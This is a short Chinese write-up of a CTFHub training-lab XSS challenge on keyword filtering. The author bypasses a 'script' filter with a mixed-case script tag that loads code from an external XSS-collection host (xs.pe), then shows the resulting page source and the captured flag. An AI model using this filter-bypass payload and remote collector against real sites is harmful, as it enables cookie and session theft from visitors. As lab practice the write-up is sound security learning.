CTFHUB技能树之XSS——过滤关键词
开启靶场,打开链接:
看上去跟上一题应该差不多,应该只是添加多点过滤规则吧
直接拿xss平台的代码试试:
<sCRiPt sRC=//xs.pe/6b6></sCrIpT>
这时候突然听到xss平台的上线语音提醒:
成功得到flag:
ctfhub{6d068d22c56fa93532d63844}
居然这么快就过关了?有点不太相信,查看一下源代码:
<html lang="en"><head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>CTFHub 技能学习 | XSS 关键词过滤
</title>
<link rel="stylesheet" href="/static/bootstrap.min.css">
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://cdn.bootcss.com/html5shiv/3.7.3/html5shiv.min.js"></script>
<script src="https://cdn.bootcss.com/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
<script src="/static/jquery.min.js"></script>
<script src="/static/popper.min.js"></script>
<script src="/static/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<div class="jumbotron text-center">
<h1>
XSS 关键词过滤
</h1>
<hr>
<!-- Alert -->
<div id="alert">
<div id="success" class="alert alert-success" role="alert" style="display: none;"></div>
<div id="fail" class="alert alert-danger" role="alert" style="display: none;"></div>
</div>
<!-- Body -->
<div>
<form action="" method="GET">
<div class="input-group mb-3">
<div class="input-group-prepend">
<span class="input-group-text">What's your name</span>
</div>
<input type="text" class="form-control" placeholder="CTFHub" id="name" name="name">
<div class="input-group-append">
<input type="submit" value="Submit" class="btn btn-success">
</div>
</div>
</form>
<!-- Output -->
<hr>
<div>
<h1>Hello, <script src="//xs.pe/6b6"></script>
</h1>
</div>
<hr>
</div>
<!-- Submit -->
<div>
<h2>Send URL to Bot</h2>
<div class="input-group mb-3">
<div class="input-group-prepend">
<span class="input-group-text">URL</span>
</div>
<input type="text" class="form-control" id="url" name="url">
<div class="input-group-append">
<input type="button" id="Send" value="Send" class="btn btn-success" onclick="send()">
</div>
<script>
function send() {
let url = $("#url").val()
$.ajax({
type: "post",
url: "/submit",
dataType: "json",
contentType: "application/json",
data: JSON.stringify({
url: url
}),
success: function (d) {
if (d.code == -1) {
$("#fail").text(d.msg)
$("#fail").show();
setTimeout(function () {
$("#fail").hide();
}, 5000);
} else if (d.code == 0) {
$("#success").text(d.msg)
$("#success").show();
setTimeout(function () {
$("#success").hide();
}, 5000);
}
}
});
}
</script>
</div>
</div>
</div>
</div>
</body></html>
好吧,看起来过滤规则是写在后端代码,前端代码没有任何信息,不过后面了解到是对关键词“script”进行了过滤,刚好复制的代码是大小写的,所以可以直接绕过